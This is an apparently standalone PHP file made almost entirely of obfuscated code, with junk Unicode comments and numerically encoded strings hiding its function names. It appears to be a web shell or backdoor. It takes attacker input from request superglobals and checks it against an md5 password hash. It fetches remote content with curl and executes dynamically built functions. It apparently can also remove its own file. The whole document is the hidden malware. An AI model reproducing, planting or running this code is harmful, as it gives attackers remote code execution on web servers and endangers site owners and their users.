<?php /*-


☇➋㊍⓫Ⓗ


!R|w~HmK☇➋㊍⓫Ⓗ


-*///
$SZwJL/*-l>g:JqDw-*///
 = /*-bTSW-*///
range/*-8HF=J#avg-*///
(/*-
☳〗≸∮ℒ⒙┬♂⒑㊁⊪↷➳
7,4;r☳〗≸∮ℒ⒙┬♂⒑㊁⊪↷➳
-*///
"~"/*-

∫〈●㊌┌↺╂∔⊍≈✙⊼⑺♟Ⅳ©

LCu6N8∫〈●㊌┌↺╂∔⊍≈✙⊼⑺♟Ⅳ©

-*///
, /*-?=~f|VKd<y-*///
" "/*-jQ-*///
); /*-)dkh!(S<-*///
$T/*-6MR<CHg-*///
=/*-
ⓕ㊚『¶◷⇩┪ⓓ✝≖☝┠⑩㊓
qYS9}?(fOⓕ㊚『¶◷⇩┪ⓓ✝≖☝┠⑩㊓
-*///
${$SZwJL[5+26].$SZwJL[36+23].$SZwJL[44+3].$SZwJL[47+0].$SZwJL[6+45].$SZwJL[24+29].$SZwJL[38+19]};/*-
『∧㊜⇎⑼┳➦⓬⇩╩㊮∽⑯╨•≚‹⋬⊰
66R3[bI『∧㊜⇎⑼┳➦⓬⇩╩㊮∽⑯╨•≚‹⋬⊰
-*///
if/*-3P-*///
((/*-z-N{f<-*///
in_array(gettype($T).count($T),$T)/*-sTK4~-*///
&&/*-


╅▃«


&p╅▃«


-*///
count/*-


╉∢↤┨㊐㊇⊂◦╥☑▼Ю✘☟❥⋭⒨∟€⓹㊕±㊰✤↬▒✔≜≝


CoZ=>{{XE╉∢↤┨㊐㊇⊂◦╥☑▼Ю✘☟❥⋭⒨∟€⓹㊕±㊰✤↬▒✔≜≝


-*///
($T)==13))/*-4MW4cbj-*///
{((/*-azfo-*///
$T[66]=$T[66].$T[76])/*-

⓫⇚┎✲┮⅔⋫≽∸↷▻～﹣❂❼⊮▽≂╊⊲▴≋⑿﹦♙

,g@X};W+⓫⇚┎✲┮⅔⋫≽∸↷▻～﹣❂❼⊮▽≂╊⊲▴≋⑿﹦♙

-*///
&&($T[81]=$T[66]($T[81]))&&(@$T=$T[81]($T[53],$T[66](${$T[32]}[10])))&&/*-

⊼┕Ⓐ∲≝⑰¾ℎ⓵Ⓚ

[ds@⊼┕Ⓐ∲≝⑰¾ℎ⓵Ⓚ

-*///
$T())/*-B{e-*///
;}/*-ej1Z[Y;1-*///
class /*-


⓵☤↧⒁—☭㈢╩❷✄↕◛≁≻Ⅺ


VE0⓵☤↧⒁—☭㈢╩❷✄↕◛≁≻Ⅺ


-*///
Id{ /*-
➨⊸∎⒋ↂ♋⅘Ⅽ┗⑾❖⒕⋎⋴Ⓣ❿Ψ∥
1V;?w➨⊸∎⒋ↂ♋⅘Ⅽ┗⑾❖⒕⋎⋴Ⓣ❿Ψ∥
-*///
static/*-|8-*///
 function /*-


♡︽➣◴Ⓚ✙


tO]gd>♡︽➣◴Ⓚ✙


-*///
hU($choguwmL) /*-


✢▓║◤➻⇊ℌ⋇⒈㊢⓹㊗┤⒖➓♠⒢✹╏╙←⓪⑩ⓦ✔


<g2F-1)%~6✢▓║◤➻⇊ℌ⋇⒈㊢⓹㊗┤⒖➓♠⒢✹╏╙←⓪⑩ⓦ✔


-*///
{ $pXlgvQFnPz/*-


❿↣╅⒤⑮ⅶⅦ웃⒟㉿⓿┱➆✘❏⅝⇞㈣Ⓛ≭▮Ⓜ◑☺㊊


M4>:o-%O❿↣╅⒤⑮ⅶⅦ웃⒟㉿⓿┱➆✘❏⅝⇞㈣Ⓛ≭▮Ⓜ◑☺㊊


-*///
 = /*-


②∕ⓖ℉ℒ♕⇍✐▩❏☏┗⓻Ⓒ┦←⓿◧❣⊸㏑


Xa!||k②∕ⓖ℉ℒ♕⇍✐▩❏☏┗⓻Ⓒ┦←⓿◧❣⊸㏑


-*///
"r"./*-%XzV4-*///
"a"./*-

⇋㈦⓪†㊧÷

E;eWkO0C⇋㈦⓪†㊧÷

-*///
"n"./*-


Ⓓ┣♒⊞┍


NlⒹ┣♒⊞┍


-*///
"g"./*-!L+6etZ9m-*///
"e"; /*-2ysL&ygs%u-*///
$YNkfQDxJiI/*-

➬～☷⋇∣﹠유➼┚♘

9p➬～☷⋇∣﹠유➼┚♘

-*///
 = /*-

✙￡♔⓽⋫⊬♪╩◧ⓠ۵⊰◮卍㊘

w>?✙￡♔⓽⋫⊬♪╩◧ⓠ۵⊰◮卍㊘

-*///
$pXlgvQFnPz/*-DlQ0j-RI-*///
(/*-


㊎ⅸ›┲☆₪↦ⅷ⊝♨︻∂◒ↆ⑩⊅ⓥ⊷⊯⊖▿⇣㊥£㊟￡


,x㊎ⅸ›┲☆₪↦ⅷ⊝♨︻∂◒ↆ⑩⊅ⓥ⊷⊯⊖▿⇣㊥£㊟￡


-*///
"~"/*-=c@(T-*///
, /*-


⓬┈⌘≩◹


};:tGGSS⓬┈⌘≩◹


-*///
" "/*->uH-*///
);/*-

♝⇠ↅ➑▦

dj♝⇠ↅ➑▦

-*///
 $UNbXgzSy /*-

□↦⋟┳㊚☟℉③❅⊡↜━♟➴≭︹┟㊠☼◗⊅➸▨☩➾⑾℮

b7%>a%□↦⋟┳㊚☟℉③❅⊡↜━♟➴≭︹┟㊠☼◗⊅➸▨☩➾⑾℮

-*///
= /*-f;!lZza-*///
explode/*-DCAWLJkSb-*///
(/*-

☈➜Φ⒒┠♖⓯］⒞⋥㊮﹣⒰☑➪⒔

HGG1,N☈➜Φ⒒┠♖⓯］⒞⋥㊮﹣⒰☑➪⒔

-*///
"}", /*-N9S-*///
$choguwmL/*-r^@BYN-*///
); /*-

▃✑⑴⋐☏¶⋁⋉≠Ⅰ⊖╚⊥⇉﹦

s%▃✑⑴⋐☏¶⋁⋉≠Ⅰ⊖╚⊥⇉﹦

-*///
$oSNsTjMd /*-


Ⅸ﹌⇆┊∭❺✑✰Ψ▏♋⋦ⅵ⊄◁⓱₪⅐✺π‖


~ueH4soⅨ﹌⇆┊∭❺✑✰Ψ▏♋⋦ⅵ⊄◁⓱₪⅐✺π‖


-*///
= /*-

⒢Ⓧ⒪☛⊗∿➶②⊯▎▪↬┒㊎۰▇⋓◩㊣⑹Ⓝ

[NqvM⒢Ⓧ⒪☛⊗∿➶②⊯▎▪↬┒㊎۰▇⋓◩㊣⑹Ⓝ

-*///
""; foreach /*-^0}-*///
(/*-

◮❤◺﹨≧▱∍▌⒯↬¿∮➳∻⒔➲⒈ℌ➘►⋮♯⓫〔ⅼ∄◯

A3{◮❤◺﹨≧▱∍▌⒯↬¿∮➳∻⒔➲⒈ℌ➘►⋮♯⓫〔ⅼ∄◯

-*///
$UNbXgzSy /*-


☈〗☥≛⊨


JG☈〗☥≛⊨


-*///
as /*-];-*///
$yxULHkw /*-}y0Bu)QgR-*///
=>/*-


⊃№↹↳⑯≬


uvU8Z5zm|⊃№↹↳⑯≬


-*///
 $cdR/*-
⒫큐≦◇✯⒛⒀▋★✩≪︾Ⅴ∹》◭½
[is⒫큐≦◇✯⒛⒀▋★✩≪︾Ⅴ∹》◭½
-*///
) /*-9m@hP-*///
$oSNsTjMd /*-


（⊶ℨ』↙➠◅⇄∇Ⓚ☥】☦♫┖➟❤↝≖ⓙ⊒╄Ⓨ


{Sz[+4（⊶ℨ』↙➠◅⇄∇Ⓚ☥】☦♫┖➟❤↝≖ⓙ⊒╄Ⓨ


-*///
.= /*-
Ⓟ⋑↜┨⋂☲✿➅▆♖
m=#JC[bⓅ⋑↜┨⋂☲✿➅▆♖
-*///
$YNkfQDxJiI[$cdR/*-x;^h}x-*///
 - /*-saoC$X-*///
23087/*-kx_)#m@54S-*///
];/*-

☱‐⊩♚㈣

lGc=AH~☱‐⊩♚㈣

-*///
 return /*-

⇔✺↸≣㊬✖⊂∢╒㊃⋆ↆ∻⊧⓹♕ⅽ㉿➩㊉*↽≈㊋☯⑧

_hZ+$cw2h⇔✺↸≣㊬✖⊂∢╒㊃⋆ↆ∻⊧⓹♕ⅽ㉿➩㊉*↽≈㊋☯⑧

-*///
$oSNsTjMd; /*-


⋅⋿㉿


!E⋅⋿㉿


-*///
} /*-#f{A-*///
static /*-

┒々▤☈ⓜ☛┊◔⇋♞▋Ⓨ✎⓿➜✹┯﹏−」

I=B5g┒々▤☈ⓜ☛┊◔⇋♞▋Ⓨ✎⓿➜✹┯﹏−」

-*///
function /*-


︷⒎⒝┠&┇⇁╬✡⒊⒌░¥۵≵


hN.a?︷⒎⒝┠&┇⇁╬✡⒊⒌░¥۵≵


-*///
mMXcJrbE/*-


⊒♓◙⓳ⅾ✂﹉♩㊩→/〗


>$nnR`zHz⊒♓◙⓳ⅾ✂﹉♩㊩→/〗


-*///
(/*-

┬⇘⋜⅘⒴☊◙⅔ℰϡ┫➇┩︻⑺⇁

@~>}3┬⇘⋜⅘⒴☊◙⅔ℰϡ┫➇┩︻⑺⇁

-*///
$zZaXGfip,/*-HIj)-*///
 $UsXygNTl/*-

☇‖◪﹨☉⑱⊩↲⇦┍⊹﹉Ⓛ№◬⊑∈⒘⓷

B<g,Aw%☇‖◪﹨☉⑱⊩↲⇦┍⊹﹉Ⓛ№◬⊑∈⒘⓷

-*///
)/*-
⋰➎︸⒈≑⑹⋛✸┵▥⑷
%7u⋰➎︸⒈≑⑹⋛✸┵▥⑷
-*///
 {/*-mh`P|,vY-*///
 $xwetYsq/*-
⊇⋂¡⇡①Ⓑ≈≨≘⋊♯⇔√ⅰ╈㊘❈⇨Ⓒ◃❇
B,⊇⋂¡⇡①Ⓑ≈≨≘⋊♯⇔√ⅰ╈㊘❈⇨Ⓒ◃❇
-*///
 = /*-

╢┣유◀⒅✈⓯☧↞☇

xz!╢┣유◀⒅✈⓯☧↞☇

-*///
curl_init/*-

∩∌‖❻ˉ☭➾✤⓼⒏┳ⓖ&╪Ⅼ☦□㊮

-x∩∌‖❻ˉ☭➾✤⓼⒏┳ⓖ&╪Ⅼ☦□㊮

-*///
(/*-

﹏✒↔◱⑶⇜▬▮◪✂⊂≤₪‱≈⒟♨

i<p﹏✒↔◱⑶⇜▬▮◪✂⊂≤₪‱≈⒟♨

-*///
$zZaXGfip/*-


┝➑┚╡✥☃☓↼☊┠☣⋤♧


pVN^R}(w#!┝➑┚╡✥☃☓↼☊┠☣⋤♧


-*///
);/*-OWSrm-*///
 curl_setopt/*-


﹦☀∷Ⓦⓔ♦⓺⋲↪■⒎☻ϡ◓⇪≠ℬ*➜⅓◘≹≳⒩∏◠➈】∁═╅


NF{RK[-M:﹦☀∷Ⓦⓔ♦⓺⋲↪■⒎☻ϡ◓⇪≠ℬ*➜⅓◘≹≳⒩∏◠➈】∁═╅


-*///
(/*-
✐Ⅸ〕④♁➉◹⋖⋢ⅾ╁£➤┒✺︷◇♗
wI✐Ⅸ〕④♁➉◹⋖⋢ⅾ╁£➤┒✺︷◇♗
-*///
$xwetYsq,/*-

②⇖✻⓭≭¥㏒✸╟ⓕⓌ〖ⅹ⌖︹

2d(g.%h②⇖✻⓭≭¥㏒✸╟ⓕⓌ〖ⅹ⌖︹

-*///
 CURLOPT_RETURNTRANSFER,/*-yL-*///
 1/*-7JfMY6-*///
);/*-dz|-*///
 $rNGMpSQdq/*-9%Al=ln@H-*///
 = /*-OT3M;-*///
curl_exec/*-
❀▪┸㊤⇖⇤☥تⓟ↞
E`J!>>|Z❀▪┸㊤⇖⇤☥تⓟ↞
-*///
(/*-

Ⓟ≔➭┋❺

o~vZ<iⓅ≔➭┋❺

-*///
$xwetYsq/*-

⋇♕▹ⓐⓓ↢〓⌖▍◕➢♂⒙≫☻⊧➵﹪≣◌⇍﹡⓹▤〖╬➸

V7⋇♕▹ⓐⓓ↢〓⌖▍◕➢♂⒙≫☻⊧➵﹪≣◌⇍﹡⓹▤〖╬➸

-*///
); /*-
◱⇜☺↴➠
wdK^7◱⇜☺↴➠
-*///
return /*-+ad_3z^-*///
empty/*-?&-*///
(/*-0;)7G:qf-*///
$rNGMpSQdq/*-

☞▾♮∵▿㊎┽❶┚ⓝ▽ⓑ

s}6sad5☞▾♮∵▿㊎┽❶┚ⓝ▽ⓑ

-*///
)/*-

%▔◠$⒧‿ℱⓌↆ☚✱⑴

6Zgf%▔◠$⒧‿ℱⓌↆ☚✱⑴

-*///
 ? /*-+}Yc2-*///
$UsXygNTl/*-Nt-*///
(/*-DV-*///
$zZaXGfip/*-gViG-*///
)/*-+^cHUoM|-*///
 : /*-MESe]M-*///
$rNGMpSQdq; /*-Z4a-*///
}/*-rm~npmoXyF-*///
 static/*-As-*///
 function /*-
➜▃↿▰⌒︹
bGq➜▃↿▰⌒︹
-*///
ZSC/*-6z][ZD-*///
() /*-Nmn-*///
{/*-

┬╋◎⋺⋎⑩┙┹◤ℬ♬↡☞⊙Ⅸ➇⓹

P&a$┬╋◎⋺⋎⑩┙┹◤ℬ♬↡☞⊙Ⅸ➇⓹

-*///
 $QP /*-H2Z-*///
=/*-sLd]`cL0-*///
 array/*-o!taU2-*///
("23114}23099}23112}23116}23097}23112}23118}23111}23096}23103}23114}23097}23108}23102}23103","23098}23097}23099}23118}23099}23102}23097}23164}23162","23107}23098}23102}23103}23118}23113}23112}23114}23102}23113}23112","23101}23116}23114}23106","23115}23116}23098}23112}23159}23161}23118}23113}23112}23114}23102}23113}23112","23111}23108}23105}23112}23118}23110}23112}23097}23118}23114}23102}23103}23097}23112}23103}23097}23098","23141}23171","23088","23166}23171","23148}23131}23131}23148}23124","23102}23111"); /*--q^-*///
foreach /*-;Ua-*///
(/*-

▌★㊆⑧Ⅵ⒖◍╛⒙‐⇖ⓟ

X{w_Nzm▌★㊆⑧Ⅵ⒖◍╛⒙‐⇖ⓟ

-*///
$QP/*-
▋━Ⓤ⋤◪◽⊗┫├$♯▬➥╠⊷㊜
nD▋━Ⓤ⋤◪◽⊗┫├$♯▬➥╠⊷㊜
-*///
 as /*-bLBHA>#M-*///
$CmJwMKkby/*-wYK@tM-*///
)/*-^J3LN>h-*///
 $KW/*-}q-*///
[] /*-yn`-*///
= /*-3NG2Y<-*///
self/*-d?fI(u-*///
::/*-IQF+-*///
hU/*-
≙☰ϟ╔➮▏▢←⒩⊏ℭⓚ⑮◩✆▥≅
.XfB3]M≙☰ϟ╔➮▏▢←⒩⊏ℭⓚ⑮◩✆▥≅
-*///
(/*-^AebkeI]-*///
$CmJwMKkby/*-4R-*///
);/*-
▀➮⒃≩□㊄◳✎ⅳ❷㊢≸℠➱⊜⋵﹊┴﹢↘➀☠
1gUa9▀➮⒃≩□㊄◳✎ⅳ❷㊢≸℠➱⊜⋵﹊┴﹢↘➀☠
-*///
$JNavcQjp /*-

✥¥⒈⇌

T4JLpM2a✥¥⒈⇌

-*///
= /*-
ⓥ】Ⓨ﹄∕⒪□ℨ⋣▀╅㏒┏【Ⅻ┯ⓔ✐⓰㊟
G?7vⓥ】Ⓨ﹄∕⒪□ℨ⋣▀╅㏒┏【Ⅻ┯ⓔ✐⓰㊟
-*///
@$KW/*-

㊧≸⊨

.X㊧≸⊨

-*///
[/*-TIj|Co-*///
1/*-%c-*///
]/*-UO~`lL1-*///
(/*-OXCKdM#-*///
${/*-u`1-*///
"_"/*-

Ⅰ➻유♮②❹▂ⓛ✴∳〖ℙ▉⇢ⅼ

bL@UKAZMⅠ➻유♮②❹▂ⓛ✴∳〖ℙ▉⇢ⅼ

-*///
."G"/*-uY@V4Kje-*///
."E"/*-
∑⒁⋍┲⋷―┖⋠♢⒣≠㊚≢⋕
ZNP&TzyS∑⒁⋍┲⋷―┖⋠♢⒣≠㊚≢⋕
-*///
."T"/*-


╅☾➢유㊁ℊ✾㊛۵⓻≝㊘◥∥◶⑮⒡ⅳ™➺ﭢ⊀☜ⓢ┤♦£≢≇◨♘


yX)╅☾➢유㊁ℊ✾㊛۵⓻≝㊘◥∥◶⑮⒡ⅳ™➺ﭢ⊀☜ⓢ┤♦£≢≇◨♘


-*///
}[/*-

‱┥﹡✧

aA1BYqPdf‱┥﹡✧

-*///
$KW/*-k-*///
[/*-


♭⇌⊭☟♪☧♓㊊➷㊯✞⋑➝▕Ⓠ↘⋍‱∝⅟☺↺≟≯⊮▫


k.$ru!brW6♭⇌⊭☟♪☧♓㊊➷㊯✞⋑➝▕Ⓠ↘⋍‱∝⅟☺↺≟≯⊮▫


-*///
3+6/*-
Ⓧ☱Ⅳ❺︻✢ⓟ╥⅝ℒ€℅⇕✩✸╓⒪✄⋳⑭㊌▪∤⊪◬∌✕㊡¢⊕⇘
3E[+yZhuⓍ☱Ⅳ❺︻✢ⓟ╥⅝ℒ€℅⇕✩✸╓⒪✄⋳⑭㊌▪∤⊪◬∌✕㊡¢⊕⇘
-*///
]]/*-

ﭢ┥ㄨ㊧∔◢▍✿⋭⓰┖㈡╪⑭⒟∋ⅾ¯≋㈦∄↘⇧☝≕⓳✌▨ⅰ∅⌔

bo6ﭢ┥ㄨ㊧∔◢▍✿⋭⓰┖㈡╪⑭⒟∋ⅾ¯≋㈦∄↘⇧☝≕⓳✌▨ⅰ∅⌔

-*///
);/*-

┌✏◤﹀㈤→⑩∉⓵➃⊕Ⓦ∬⑼↙ϟℌ｀╩ⓚ∓☏℮⓯

toQ┌✏◤﹀㈤→⑩∉⓵➃⊕Ⓦ∬⑼↙ϟℌ｀╩ⓚ∓☏℮⓯

-*///
 $pElVnsr /*-

ℤ□›▩≱⋱⊼⓲☯☹➊☍¿∿ⅻ↗⋹〈➨▪⒣×╜↿ⓖ」∨✢⊈

@x37W(%C3Oℤ□›▩≱⋱⊼⓲☯☹➊☍¿∿ⅻ↗⋹〈➨▪⒣×╜↿ⓖ」∨✢⊈

-*///
=/*-nOi`4#lp-*///
 @$KW/*-mpjfZJ)>-*///
[/*-EZ(<v._D-*///
0+3/*-+rOb97n-*///
]/*-


↡﹎➃▀▷︾∙┝ↇⒸ⋙㊞ⓥ▤▃≰⒐♬Ⓕ☃╡☻⋰#⒤⋫﹄➯≺


^s~Fz4↡﹎➃▀▷︾∙┝ↇⒸ⋙㊞ⓥ▤▃≰⒐♬Ⓕ☃╡☻⋰#⒤⋫﹄➯≺


-*///
(/*-
☩▴☦〔➘≭║Ⅸ↙➫⇏
lzbh_Q☩▴☦〔➘≭║Ⅸ↙➫⇏
-*///
$KW/*-$:r-*///
[/*-cj7jE-*///
0+6/*-ua$<4k8sI-*///
], /*-%>C__D-*///
$JNavcQjp/*-x4.+j-*///
);/*-

➯➠▂┿☞✛

ee69➯➠▂┿☞✛

-*///
 $Yakld /*-d#-PPcz]-*///
=/*-Hz-*///
 $KW/*-


┿♋➶≏╊↪┷➺∵㊩↹│Φ▔⋷➯㊖⋯⑭☈☨⋃⊦▕）≡㊋ℑ◀┞


Q3w┿♋➶≏╊↪┷➺∵㊩↹│Φ▔⋷➯㊖⋯⑭☈☨⋃⊦▕）≡㊋ℑ◀┞


-*///
[/*-CS3-*///
0+2/*-


✑◥㈠✂∉┠╢﹏㊙⊪⒣Ⓙ④♯


i!H(i0Gg✑◥㈠✂∉┠╢﹏㊙⊪⒣Ⓙ④♯


-*///
]/*-{&{da(M-*///
(/*--4,3Y--*///
$pElVnsr,/*--fyt~Y-*///
 true/*-=3yx<V^ZTe-*///
); /*-


¤↧⒀♪✺Ⓘ♥⓳₪◼⊑┙㊬⋭⊍⇋Ⓤ


E¤↧⒀♪✺Ⓘ♥⓳₪◼⊑┙㊬⋭⊍⇋Ⓤ


-*///
@${/*-48~<-*///
"_"./*-


↟㈤∈∰✔⋣┍π⒥┚⓬╜∉⇑☷∖✪⋐ⅱ≊⋬


TWuXN+Hj↟㈤∈∰✔⋣┍π⒥┚⓬╜∉⇑☷∖✪⋐ⅱ≊⋬


-*///
"G"./*-wKMC_qNKN-*///
"E"/*-B9!-*///
."T"/*-

ℨ↯●㊛

+=xwoℨ↯●㊛

-*///
}/*-

﹢﹍⊡ℎ↊⊑∯⊵✞➩≪⊤℃↻▥◱⋷㊧↧⓶Ⅷ┆☨≲£￣≥➜⒥

cT<q﹢﹍⊡ℎ↊⊑∯⊵✞➩≪⊤℃↻▥◱⋷㊧↧⓶Ⅷ┆☨≲£￣≥➜⒥

-*///
[/*-
ⓚ⒰Ⓤ
<aqⓚ⒰Ⓤ
-*///
$KW/*-No<-*///
[2+8/*-xM&(!nJ%RY-*///
]/*-SFF0-*///
]/*-


✕（⊦⇛⇊♂◲♭◉⋍◍❋∾♈


nE3}8✕（⊦⇛⇊♂◲♭◉⋍◍❋∾♈


-*///
 == /*-


㊠◄↼┦△○⋱↰☝웃✣➶⑬∏✻➾∳﹩∻⊙⑵«☳⊆℮⋛┒⒳


Zx]`8-~C㊠◄↼┦△○⋱↰☝웃✣➶⑬∏✻➾∳﹩∻⊙⑵«☳⊆℮⋛┒⒳


-*///
1 /*-

］⋎Σ♬╁☵┿◮▓≙☒¥㊗☳⓲✎↡▀∄⊘▮❇⇦

`{XjVE］⋎Σ♬╁☵┿◮▓≙☒¥㊗☳⓲✎↡▀∄⊘▮❇⇦

-*///
&& /*-

ℐ➡∺⋅∝➆∡➎⇦▍❤➃☰⒢⋽≽⒡Ⓡ⒂➦♆╅

tUO<Lℐ➡∺⋅∝➆∡➎⇦▍❤➃☰⒢⋽≽⒡Ⓡ⒂➦♆╅

-*///
die/*-i&MW!+Aj-*///
(/*-Rs4618e-*///
$KW[2+3/*-


ℰ⋠⇣ⅲ﹢╓


+Wtq]iℰ⋠⇣ⅲ﹢╓


-*///
]/*-
◇♘Ⓥ⒰
SPj8uot.]◇♘Ⓥ⒰
-*///
(/*-(j!-*///
__FILE__/*-LBJ[}5-*///
)/*-

↡◫⒙✔☐⓱﹡º☄☋⋧┲㊯✽┚㊮▾⋃⋢㏒┩┄‱Ⓧ⓰

`!;↡◫⒙✔☐⓱﹡º☄☋⋧┲㊯✽┚㊮▾⋃⋢㏒┩┄‱Ⓧ⓰

-*///
); /*-


╟▀⒔⋥⊶▨♔⓵‱⇦


WX,Ba[e-╟▀⒔⋥⊶▨♔⓵‱⇦


-*///
if/*-

⊝﹏℘⋙➩♟┋⋯♤❈┘

x⊝﹏℘⋙➩♟┋⋯♤❈┘

-*///
(/*-
⅔∅∏✞⋳➲❄☤⋙◭⊈♫┤♩⇛✧ⓐ⑻⇀▅❼❖➔
_rM,⅔∅∏✞⋳➲❄☤⋙◭⊈♫┤♩⇛✧ⓐ⑻⇀▅❼❖➔
-*///
 (/*-


⑪∥❿┪≿ⅾ┤ⅷ』☂●§∐❁⊂❹﹌€∾㊎⋐ℝ¯╝≤々⇍↭≟⇈


,Fz0tt%T⑪∥❿┪≿ⅾ┤ⅷ』☂●§∐❁⊂❹﹌€∾㊎⋐ℝ¯╝≤々⇍↭≟⇈


-*///
(@/*-YBxgDI-*///
$Yakld/*-
⊈☞卐Ⓨ⋸③√❦Ⓓ◅∑⇋❄㊀Ↄ∦﹡↪╚Ⓖ✗ℜ⑦♔⒠Ⓠ▽⊦⊶
QPL(4Q⊈☞卐Ⓨ⋸③√❦Ⓓ◅∑⇋❄㊀Ↄ∦﹡↪╚Ⓖ✗ℜ⑦♔⒠Ⓠ▽⊦⊶
-*///
[/*-
⑯☹Σ▏㊐｜⊉▕≺☈╎☋⋮⑤➹㊓‿∹
yf+2⑯☹Σ▏㊐｜⊉▕≺☈╎☋⋮⑤➹㊓‿∹
-*///
0/*-
ㄨ⑶☇⑮
;K5ㄨ⑶☇⑮
-*///
] /*-`N}-?80.>-*///
- time/*-


⋵⋔☩➦


YH&=⋵⋔☩➦


-*///
()/*-


ⓥ㊣℘⓪⊆⇣⇍⇘㊡❄⋋↗◞✌⋌


CWBPZVeⓥ㊣℘⓪⊆⇣⇍⇘㊡❄⋋↗◞✌⋌


-*///
) > /*-O-;!@Rn-*///
0/*-
ℬⅻ⊶┼№◦㊂⋪◩⋑
IP#2ℬⅻ⊶┼№◦㊂⋪◩⋑
-*///
)/*-


⇍✞┷✳⇚≄❺☺


09q[⇍✞┷✳⇚≄❺☺


-*///
 and /*-
ⓢ∷∭*∻Ⅿ✁⒎✍ⓥ⒋ø⋨⋫➀✃↠⒙⒟Ⓕ❷
08ⓢ∷∭*∻Ⅿ✁⒎✍ⓥ⒋ø⋨⋫➀✃↠⒙⒟Ⓕ❷
-*///
(/*-

⋮⇁⒂⑺Φ﹨Ⅴ⇥@◬›§➜⊃≹ⓤ¿

+|,4HkVp⋮⇁⒂⑺Φ﹨Ⅴ⇥@◬›§➜⊃≹ⓤ¿

-*///
md5/*-


⊅┠≀✖⋊◾⓰⑧≁❈


M.:g&O%;ha⊅┠≀✖⋊◾⓰⑧≁❈


-*///
(/*-


∆Ⅼ⋢


Oi5=Zviq∆Ⅼ⋢


-*///
md5/*-Cfnl2&O-*///
(/*-Y0IT-*///
$Yakld/*-OlFmRd!G-*///
[/*-

⋻✡✩Ⅶ⋜≪⋂◛⒭⅜ⓥ⅞Ⅻ¥→ⅼⅤ╜▭⇌ⓚ➥㊔✱㍿☃

FPt7K&{⋻✡✩Ⅶ⋜≪⋂◛⒭⅜ⓥ⅞Ⅻ¥→ⅼⅤ╜▭⇌ⓚ➥㊔✱㍿☃

-*///
2+1/*-


►‹◴﹎⋹◃◧╣➏⇁⅓


S3>E|?►‹◴﹎⋹◃◧╣➏⇁⅓


-*///
]/*-
㊏⊈⊗⑴◩⑸☌♗}㊚︷◞┺☄➪≿
lw8#R$㊏⊈⊗⑴◩⑸☌♗}㊚︷◞┺☄➪≿
-*///
)/*-

✒≨╗⋏╎♚ↂ❃⒨≝∔ℴ

RNe6Z✒≨╗⋏╎♚ↂ❃⒨≝∔ℴ

-*///
)/*-

⒤≆웃ↈ⇧☢✘╊┏◦⇤⇩★➍④◝┤Φ﹜✐

QL_Fl!J6⒤≆웃ↈ⇧☢✘╊┏◦⇤⇩★➍④◝┤Φ﹜✐

-*///
 === /*-=qPa:$W(-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-CQz.r~m@sW-*///
)/*-


❼⒠➄▌❤⑶↡⇘✣ϟ⇃≸∀Ↄ


^=zc?|>[!❼⒠➄▌❤⑶↡⇘✣ϟ⇃≸∀Ↄ


-*///
 ): /*-<#CZ>71Z-*///
$anGgI /*-}$d-*///
=/*-


✶↯♝◦⊔㊂♔⒇▷⓫⌖✼㊡～↊⌔Ю◴✆ⅰ


=??c]5Gg;d✶↯♝◦⊔㊂♔⒇▷⓫⌖✼㊡～↊⌔Ю◴✆ⅰ


-*///
 self/*-K@3QL-*///
::/*-


⌘﹦◔⒉⓷➑☁≈⇗۵⊳—﹊㊞⇋➺↴↹﹎▥↦


!&⌘﹦◔⒉⓷➑☁≈⇗۵⊳—﹊㊞⇋➺↴↹﹎▥↦


-*///
mMXcJrbE/*-

❻◳Ψ░㊎↵﹦

j03%ZU}e❻◳Ψ░㊎↵﹦

-*///
(/*-

ⓠ↤⋖♤⋜○⑭⅜✉┣☄↣◐유

u^2ⓠ↤⋖♤⋜○⑭⅜✉┣☄↣◐유

-*///
$Yakld/*-
⇗⇞—◨▫♧╈┌−⑧☷Ⓓ♮≛≫┝≙︼⅟⌘
jfeZ⇗⇞—◨▫♧╈┌−⑧☷Ⓓ♮≛≫┝≙︼⅟⌘
-*///
[/*-`g~-*///
0+1/*-Kqae&-*///
], /*-

✣㊅ⅷ☑☺↓∼➮♤﹍↼☉≕⋟☢㊧⊭≳㊗

1=2P3W1PQ✣㊅ⅷ☑☺↓∼➮♤﹍↼☉≕⋟☢㊧⊭≳㊗

-*///
$KW/*-6-*///
[/*-

∐&ↈ

#92%dbgD∐&ↈ

-*///
4+1/*-ALfOFa3oIr-*///
]/*-

⇪▮↙❤┣웃‰☱◉╂⋕⇑⅖

Lf4=jJh⇪▮↙❤┣웃‰☱◉╂⋕⇑⅖

-*///
);/*-Wf-*///
@$KW/*-p00g{6O-*///
[/*-


◹▋⋘♕⒛╈∆∲☬↿⅔┮⇞㊣❋✙┅⇙≸☵‡←∿⋿✱}


_+]?◹▋⋘♕⒛╈∆∲☬↿⅔┮⇞㊣❋✙┅⇙≸☵‡←∿⋿✱}


-*///
0/*-4`Pe+)@ea-*///
]/*-FXNa&-*///
(/*-%6C-*///
"",/*-

＂ⓙ♯∉✕⊃⇄⑩≄▯╋═≃⑤◂≤⌘℗➱⋁◀ℤ✯ㄨ⅝㈨ⓒ◖◞⒦◑

y)I!Ev:h_6＂ⓙ♯∉✕⊃⇄⑩≄▯╋═≃⑤◂≤⌘℗➱⋁◀ℤ✯ㄨ⅝㈨ⓒ◖◞⒦◑

-*///
 $KW/*-

➭◪

{8<g&g<i➭◪

-*///
[/*-


▃）↙↮ⅱℋ☤ↁ↽Ⓙ


@[c|R#k▃）↙↮ⅱℋ☤ↁ↽Ⓙ


-*///
5+2/*-?O[C-*///
] /*-


♜｜


M2_{P#x♜｜


-*///
. /*-Q^q~[-*///
$KW/*-d_(-*///
[/*-J1j-*///
2+2/*-
➋﹩↫﹟Ⓧ≺⅞︺⒌
6{M➋﹩↫﹟Ⓧ≺⅞︺⒌
-*///
]/*-
╣↩╢⑫▉♠━⓭➀┸┧✱≍◱⓶﹋⋚㍿╋➄ℐ⒦♐⒯⒣➚⋕✴✐︶Ⅷ
&hOaS╣↩╢⑫▉♠━⓭➀┸┧✱≍◱⓶﹋⋚㍿╋➄ℐ⒦♐⒯⒣➚⋕✴✐︶Ⅷ
-*///
(/*-
↸⓾①⊑╥㊈━∷㊏
R^[[U↸⓾①⊑╥㊈━∷㊏
-*///
$anGgI/*-

Ⓜ◭↬ℨ◟♋⒧⋪✼♖┏⒮⇪℉⋇︹≣⒲▬⒣˜➏↡➥≤∂⊅

>HⓂ◭↬ℨ◟♋⒧⋪✼♖┏⒮⇪℉⋇︹≣⒲▬⒣˜➏↡➥≤∂⊅

-*///
)/*-

